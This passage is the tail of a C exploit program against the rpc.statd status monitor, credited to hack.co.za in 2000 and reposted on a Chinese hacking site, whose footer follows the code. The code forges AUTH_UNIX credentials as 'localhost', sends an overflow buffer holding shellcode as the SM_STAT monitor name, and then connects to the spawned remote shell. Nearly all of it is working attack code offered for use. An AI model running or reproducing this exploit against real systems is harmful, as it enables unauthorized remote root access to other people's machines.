case 'd': type = atoi(optarg); break;
default :
usage(argv[0]);
}
}
if(!(target =
argv[optind]))
{
fprintf(stderr, "No target host
specified\n");
exit(EXIT_FAILURE);
}
if(type >= 0)
{
if(type >=
sizeof types / sizeof types[0] - 1)
{
fprintf(stderr, "Invalid type\n");
exit(EXIT_FAILURE);
}
sc =
types[type].code;
bufpos = types[type].bufpos;
buflen = types[type].buflen;
offset =
types[type].offset;
wipe = types[type].wipe;
}
if(!bufpos)
{
fprintf(stderr, "No
buffer address specified\n");
exit(EXIT_FAILURE);
}
bzero(&addr, sizeof addr);
addr.sin_family = AF_INET;
addr.sin_port =
htons(port);
addr.sin_addr = getip(target);
tv.tv_sec = timeout;
tv.tv_usec = 0;
if(!usetcp)
{
clnt =
clntudp_create(&addr, SM_PROG, SM_VERS, tv, &sockp);
if(clnt == NULL)
{
clnt_pcreateerror("clntudp_create()");
exit(EXIT_FAILURE);
}
tvr.tv_sec = 2;
tvr.tv_usec = 0;
clnt_control(clnt,
CLSET_RETRY_TIMEOUT, (char *) &tvr);
}
else
{
clnt = clnttcp_create(&addr, SM_PROG,
SM_VERS, &sockp, 0, 0);
if(clnt == NULL)
{
clnt_pcreateerror("clnttcp_create()");
exit(EXIT_FAILURE);
}
}
/*
AUTH_UNIX / AUTH_SYS authentication forgery */
clnt->cl_auth = authunix_create("localhost", 0, 0, 0,
NULL);
buff = wizardry(sc, bufpos, buflen, offset, wipe);
smname.mon_name = buff;
res = clnt_call(clnt,
SM_STAT, (xdrproc_t) xdr_sm_name,
(caddr_t) &smname,
(xdrproc_t) xdr_sm_stat_res,
(caddr_t) &smres, tv);
if(res != RPC_SUCCESS)
{
clnt_perror(clnt, "clnt_call()");
printf("A
timeout was expected. Attempting connection to shell..\n");
sleep(5); connection(addr);
printf("Failed\n");
}
else
{
printf("Failed -
statd returned res_stat: (%s) state: %d\n",
smres.res_stat
? "failure" : "success", smres.state);
}
free(buff);
clnt_destroy(clnt);
return
-1;
}
/* www.hack.co.za [7 August 2000]*/
|
首页 
小榕软件实验室 
刀光雪影 
攻击的一般步骤 
将此页发给您的朋友
编辑
删除
发表于
2002-08-22.00:19:19 
IP: 
